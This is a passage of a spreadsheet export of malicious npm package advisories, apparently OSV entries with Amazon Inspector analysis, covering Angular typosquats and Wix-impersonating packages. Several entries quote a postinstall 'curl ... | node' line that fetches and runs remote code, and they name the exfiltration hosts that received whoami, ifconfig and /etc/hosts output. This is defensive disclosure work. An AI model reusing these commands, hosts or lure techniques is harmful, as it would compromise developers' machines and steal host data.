The package is advertised as a focus-trap utility but thunderboltRegistry.js runs an IIFE at require time that uses child_process.execSync to run whoami, id, pwd, ifconfig / ip addr, hostname, and to read /etc/hosts, then sends each command's output as query parameters to http://dxpoc.gt.tc/callback.php via fetch. A separate beacon containing Node version, platform, and pid is also posted to the same endpoint. The package additionally impersonates Wix 'thunderbolt' internal registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry) and references static.parastorage.com manifest URLs, matching a dependency-confusion lure aimed at Wix build environments. Installing or importing this package causes the installer host's identity, network configuration, and /etc/hosts contents to be sent to an attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17526</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17527</t>
        </is>
      </c>
      <c r="D184" s="5" t="inlineStr"/>
      <c r="E184" s="5" t="inlineStr"/>
      <c r="F184" s="5" t="inlineStr"/>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-focusgroup-helper</t>
        </is>
      </c>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr"/>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9c6d210f6c61d0ec49fac4bf487a2d71966b1f3dd59653d8a8fdf12e04f9b306)
tiny-focusgroup-helper@1.0.0 declares itself as a focus-group accessibility helper, but thunderboltRegistry.js runs an IIFE at require time that executes `whoami`, `uname -a`, `ifconfig`/`ip addr`, and reads `/etc/hosts` via child_process, and POSTs/GETs the output as query parameters to the hardcoded plaintext endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3, along with a beacon containing node version, platform, and pid. The dxpoc.gt.tc host is a dynamic-DNS domain unrelated to any legitimate publisher. The package's exported surface (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) mirrors internal Wix thunderbolt registry module names and the shipped manifest references static.parastorage.com, consistent with a dependency-confusion/module-impersonation lure targeting Wix build environments.
</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17527</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17528</t>
        </is>
      </c>
      <c r="D185" s="5" t="inlineStr"/>
      <c r="E185" s="5" t="inlineStr"/>
      <c r="F185" s="5" t="inlineStr"/>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-viewport-unit-calc</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr"/>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (34c221d8f8f0fedded27bfc22763912ffd96e9f3d1b2c08932e054ed418f493e)
The package ships thunderboltRegistry.js, a module that imports Node's child_process primitives and executes `whoami` plus repeated `ping` commands against external hostnames, with POST calls present in the same file. The pattern (whoami capture + repeated ping-based beacons + outbound POSTs) is host-reconnaissance and DNS/ICMP-channel exfiltration shape, directed from the installer's machine to an external endpoint. The behavior is unrelated to the package's advertised purpose (a trivial viewport-unit calculator) and provides no functionality to a consumer; its only effect is to leak host identity information off-host when the module is loaded or invoked.
</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17528</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17529</t>
        </is>
      </c>
      <c r="D186" s="5" t="inlineStr"/>
      <c r="E186" s="5" t="inlineStr"/>
      <c r="F186" s="5" t="inlineStr"/>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>npm:ultimate-websocket</t>
        </is>
      </c>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr"/>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7574e423b830695141ee6e089006e0c355109e240c69881512806869cfee8114)
package.json declares its only dependency `node-net-pool` as a bare tarball URL pointing at the mutable `main` branch of an unrelated GitHub user (`https://github.com/trktgq0wbre1/node-net-pool/archive/refs/heads/main.tar.gz`), bypassing the npm registry entirely. There is no version pin, no commit SHA, and no integrity hash, so `npm install` fetches whatever bytes that URL currently returns and runs any lifecycle scripts contained in them. The package's own `scripts.postinstall` additionally executes `node -e "...require('node-net-pool')..."`, loading the fetched module at install time so its top-level code also runs on the installer's host. The GitHub account is a throwaway-shaped handle unrelated to the publishing identity, and the shipped tarball contains no real functionality — its only install-time effect is to pull and execute attacker-controlled code from an endpoint whose contents the author can change at any time.
</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17529</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17530</t>
        </is>
      </c>
      <c r="D187" s="5" t="inlineStr"/>
      <c r="E187" s="5" t="inlineStr"/>
      <c r="F187" s="5" t="inlineStr"/>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>npm:wcag-color-a11y-helpers</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr"/>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8b6e72298f32298d6558f5d52eb7a9d5185b37fe8df14748bf61d6686dde1cb3)
Package is advertised as a WCAG color accessibility helper library but ships thunderboltRegistry.js, an IIFE that on module load executes shell commands (whoami, id, pwd, ifconfig/ip addr, hostname) and transmits the output via HTTP GET and DNS subdomain lookups to the hardcoded Burp Collaborator host gzjsunzfc6i9od2ouhb6dl4a61cs0qof.oastify.com, along with node/platform/pid metadata and an 'rce-poc' beacon string. The package exports factory functions under names mirroring Wix Thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, autoCompleteRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry), and ships a registry-manifest.min.json that maps all of those registry names to thunderboltRegistry.js — a dependency-confusion/typosquat shape against Wix's @wix/thunderbolt-* internal registries. Any consumer that resolves one of these names loads and executes the recon/exfiltration payload. The a11y naming is a cover story unrelated to the actual code.
</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17530</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17531</t>
        </is>
      </c>
      <c r="D188" s="5" t="inlineStr"/>
      <c r="E188" s="5" t="inlineStr"/>
      <c r="F188" s="5" t="inlineStr"/>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>npm:api-nebula</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr"/>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b8232ec7756422686c2bce805fc87821e61a5bd9176cdb2fe7c3190fd2b2eae2)
The package declares `"preinstall": "node preinstall.cjs"` in package.json, and preinstall.cjs is a single-line ~187 KB `Function("pbeIUC", "…")` invocation implementing a custom PRNG plus string-table decoder (numeric constant table, printable-charset string table `UclPgF`, a Bob-Jenkins-style mixer, and a decoder that reconstructs strings via modular arithmetic against `UclPgF.charCodeAt(...)`). The file contains no readable logic — its entire payload is an opaque blob that is decoded and handed to the JS engine during `npm install`. String fragments visible pre-decoding (e.g. `F.kI`, `zehSPTc@y.Ge`, `vCpP.BB/.i+gUAKa`) are placeholder-shaped and only resolve to real hosts/commands after runtime decoding, so the actual install-time behavior and any network destinations are hidden from static inspection. The wrapper module (nebula.js) and package.json declare no native build step, no compilation, and no other legitimate reason for a 187 KB obfuscated preinstall script. This is the canonical obfuscated npm preinstall dropper shape: arbitrary attacker-authored code executes on every installer's machine at `npm install` time, with intent to evade review deliberately concealed by the string-table + Function-eval loader.
</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17531</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17532</t>
        </is>
      </c>
      <c r="D189" s="5" t="inlineStr"/>
      <c r="E189" s="5" t="inlineStr"/>
      <c r="F189" s="5" t="inlineStr"/>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>npm:@abgular/core</t>
        </is>
      </c>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr"/>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4c4c8470613dc3a49e249f1a9f91bc756bb9b4323c78268b35816f07e78a0a9b)
Package name `@abgular/core` is a single-character transposition of `@angular/core` and copies that package's description, author, and repository metadata. The package.json declares a `postinstall` script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party code-hosting service via web.archive.org and piping it directly into `node` during `npm install`. The fetched code executes on the installer's machine with the installer's privileges; its contents are mutable and attacker-controlled. The deceptive package identity ensures developers who mistype `@angular/core` trigger this remote-code execution.
</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17532</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17533</t>
        </is>
      </c>
      <c r="D190" s="5" t="inlineStr"/>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="inlineStr"/>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr">
        <is>
          <t>npm:@anfular/core</t>
        </is>
      </c>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr"/>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (eefc706854c122c96c898da5d4db285f26e31430f25451e5d1073a31db5e5341)
Package @anfular/core@22.2.1 is a one-character typosquat of @angular/core, with manifest fields impersonating the official Angular package (scope @anfular, description 'Angular - the core framework', author 'angular', repository pointing at github.com/angular/angular). The package.json postinstall script runs 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node', downloading an unpinned JavaScript payload from an attacker-controlled gitflic.ru URL (fronted by a web.archive.org wrapper) and piping it directly into node for execution on the installer's machine at npm install time. The fetched code is unverified, unpinned, hosted off any official registry or publisher-matched domain, and executed with the installer's privileges, giving the author arbitrary code execution on every machine that installs the package.
</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17533</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17534</t>
        </is>
      </c>
      <c r="D191" s="5" t="inlineStr"/>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="inlineStr"/>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr">
        <is>
          <t>npm:@angjlar/core</t>
        </is>
      </c>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr"/>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9)
Package @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On `npm install`, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.
</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17534</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17535</t>
        </is>
      </c>
      <c r="D192" s="5" t="inlineStr"/>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="inlineStr"/>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr">
        <is>
          <t>npm:@anguar/core</t>
        </is>
      </c>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr"/>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb)
Package @anguar/core impersonates @angular/core: scope name differs by one letter and package.json name, description, author, and repository metadata are copied from the real @angular/core. The package.json declares a postinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a gitflic.ru path under the user `hellscripter` (proxied through web.archive.org) and piping it into Node. The remote source is unpinned, unverified, hosted on infrastructure unrelated to the Angular project, and under full control of a third party. Any developer who mistypes the Angular scope and runs `npm install` will execute arbitrary attacker-controlled code on their machine.
</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17535</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17536</t>
        </is>
      </c>
      <c r="D193" s="5" t="inlineStr"/>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="inlineStr"/>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr">
        <is>
          <t>npm:@angulaar/cli</t>
        </is>
      </c>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr"/>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (33d4a58c855f9b549d39f194483ee19730552bbb47a279f73237c8a403708d20)
Package name '@angulaar/cli' (double 'a') is a one-character edit of '@angular/cli'; README, LICENSE headers, and source files are copied verbatim from the real Angular CLI (Google LLC copyright, angular.dev license URLs, README pointing issues to github.com/angular/angular-cli). The manifest's dependencies list has been altered from the upstream package: real @angular/cli depends on '@modelcontextprotocol/sdk', while this package declares '@modelcontextprotocol/server': '2.0.0' and requires it from src/commands/mcp/cli.js and mcp-server.js. '@modelcontextprotocol/server' is not the official MCP package name, so npm install resolves and installs whatever bytes are published under that attacker-chosen name/version, executing any lifecycle scripts in that dependency on the installer's host and loading its code in-process on later `ng mcp` invocations. The lookalike package name, cloned source, and swapped MCP dependency together form a dependency-confusion delivery vector against developers who mistype the real @angular/cli name.
</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17536</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17537</t>
        </is>
      </c>
      <c r="D194" s="5" t="inlineStr"/>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="inlineStr"/>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr">
        <is>
          <t>npm:@angulaar/core</t>
        </is>
      </c>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr"/>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (42861c7641349d2f58380e4f81b13ad9738dd254f224e9f7f239d9cf940cf792)
The package's package.json defines a postinstall lifecycle script that fetches a JavaScript file from a non-publisher host (gitflic.ru, proxied via web.archive.org, at the path /project/hellscripter/install-scripts/blob/raw?file=node.js) and pipes the response directly into node, executing arbitrary remote code on the installer's machine during npm install. The fetched code is unpinned, unverified, and controlled by a third-party account unrelated to the Angular project. The package name @angulaar/core resembles @angular/core, increasing the likelihood of accidental installation.
</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17537</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17538</t>
        </is>
      </c>
      <c r="D195" s="5" t="inlineStr"/>
      <c r="E195" s="5" t="inlineStr"/>
      <c r="F195" s="5" t="inlineStr"/>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>npm:@angulr/core</t>
        </is>
      </c>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr"/>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c24dfd4b0a686b9056ff662e6fee53edfe23c7a94a5edf93fb4cace176216518)
The npm package `@angulr/core` masquerades as Angular's `@angular/core` by cloning its package.json metadata (description 'Angular - the core framework', author 'angular', repository angular/angular, ng-update packageGroup) while shipping a hostile `postinstall` script. The postinstall hook runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, piping an unpinned, remotely fetched JavaScript payload directly into Node at install time. The destination is a personal `hellscripter` project on gitflic.ru fronted via web.archive.org, unrelated to Angular's publisher. Any developer running `npm install @angulr/core` executes attacker-controlled code with the installer's privileges, with no integrity check and no pinning.
</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17538</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17539</t>
        </is>
      </c>
      <c r="D196" s="5" t="inlineStr"/>
      <c r="E196" s="5" t="inlineStr"/>
      <c r="F196" s="5" t="inlineStr"/>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr">
        <is>
          <t>npm:@angupar/core</t>
        </is>
      </c>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr"/>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (61d3f74118d7ca9e50d79028ad472e56f68c8f86111fb03973a0c01a00b4cd84)
Package impersonates @angular/core (name @angupar/core, author field "angular", repository pointing at github.com/angular/angular, README copied from Angular). Its package.json postinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a third-party user account (`hellscripter` on gitflic.ru) through a web.archive.org proxy and piping it directly to the installer's Node runtime. The fetch is unpinned, has no integrity check, and resolves to a host unrelated to the Angular project. `npm install @angupar/core` therefore yields arbitrary install-time code execution under attacker control, with the typosquat on @angular/core serving as the delivery lure.
</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
